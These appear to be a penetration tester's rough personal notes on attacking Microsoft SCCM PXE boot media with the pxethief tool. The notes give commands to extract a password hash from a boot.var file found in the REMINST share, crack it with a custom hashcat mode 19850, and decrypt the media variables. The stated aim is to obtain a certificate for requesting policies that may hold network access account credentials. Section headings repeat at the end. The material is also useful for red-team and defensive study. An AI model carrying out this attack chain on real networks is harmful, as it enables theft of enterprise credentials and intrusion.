pxethief

note

Notes below are pretty rough.

Reminder to self: this runs best on Windows!

Install

Get python install from python.org - 64bit installer

pip install -r requirements.txt

Identify hash of the password that was used to encrypt the variables

pxethief.py 5 boot.var

Note: the boot.var is a file you might find in the \\SCCMSERVER\REMINST\SMSTEMP folder

Crack the extracted hash

I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:

hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt

Decrypt and retrieve contents of the media variables file (if cracking was successful)

pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE

At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences which may have the NAA or other creds.

Note: I had a heck of a time getting this attack to work, but I opened a GitHub issue and then eventually did figure it out!

Install​

Identify hash of the password that was used to encrypt the variables​

Crack the extracted hash​

Decrypt and retrieve contents of the media variables file (if cracking was successful)​

Install

Identify hash of the password that was used to encrypt the variables

Crack the extracted hash

Decrypt and retrieve contents of the media variables file (if cracking was successful)